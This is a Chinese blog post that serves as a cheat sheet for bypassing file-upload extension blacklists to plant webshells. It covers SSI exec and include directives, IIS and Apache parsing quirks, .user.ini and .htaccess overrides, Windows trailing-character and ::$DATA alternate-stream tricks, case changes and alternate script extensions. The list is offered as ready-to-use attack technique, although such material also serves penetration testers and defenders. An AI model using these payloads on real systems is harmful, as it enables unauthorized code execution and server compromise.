溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
獲取短信驗證碼
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
登 錄 注冊有禮
云服務器 香港服務器 高防服務器
最新更新 網站標簽 地圖導航
產品

文件上傳之黑名單驗證繞過

發布時間:2020-07-27 15:37:05 來源:網絡 閱讀:5064 作者:serverxx0 欄目:安全技術

當做代碼的審計或者文件搞滲文章上傳的時候有時候會遇到黑名單的驗證碼,比如常規的一些腳本名asp php jsp這種的不允許上傳,下面是我總結的一些繞過的方法

Shtml

<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用來讀文件

<!--#exec cmd="ifconfig"--> //可以用來執行命令

iis解析

sanr.php;.gif

sanr.asp;.jpg

sanr.asp/sanr.jpg

.user.ini

User.ini

auto_prepend_file:指定在每個PHP頁面執行前所要執行的代碼

auto_prepend_file=demo.gif (每個頁面都會加載demo.gif)

.htaccess

AddTypeapplication/x-httpd-php     .jpg

Window特性

  1.   利用空格        demo.php空格 

  2.   小數點去繞過      demo.php.

  3.   Ads數據流         demo.php::$DATA

  4.   Ads數據流(但文件是空)  demo.php:jpg

Window通配符   demo.<<<   兩者相結合拿到webshell

Tips:直接用3就可以  只不過延伸下window通配符的方法

      Window通配符可以在包含文件的時候包含c:window/temp目錄臨時php文件(文件包含本地測試成功 但是實際***很少成功 因為session文件也是php開頭 如同時匹配多個文件以php開頭的這種,會拿到第一個php文件,不確保是自己上傳的臨時文件)

大小寫繞過

aSp  pHp  JsP

擴展名繞過

Aspasa  cer  cdx 

Aspx: ashx  asmx ascx

Php:  php3 phtml

Jsp:   jspx  jspf

Apache的解析

         sanr.php.xxxxxx


附件:http://down.51cto.com/data/2366130
向AI問一下細節
推薦閱讀:
  1. SQL注入繞過登錄驗證
  2. web黑名單驗證繞過

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

文章 黑名單 數據流

猜你喜歡

最新資訊
相關推薦

相關標簽

數據流圖 數據流程 nginx ip php 數組 android window 文章 iptables 防火墻 怎么辦 名單 出口 職場 郵件系統 數據流 broadcast 反垃圾 休閑
AI

產品服務
地區劃分
專題活動
幫助支持
關于我們
售后咨詢
7*24小時在線電話:400-100-2938
7*24小時在線 QQ:800811969
關注億速云

億速云公眾號

手機網站二維碼

Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有

廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號:B1-20181529

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女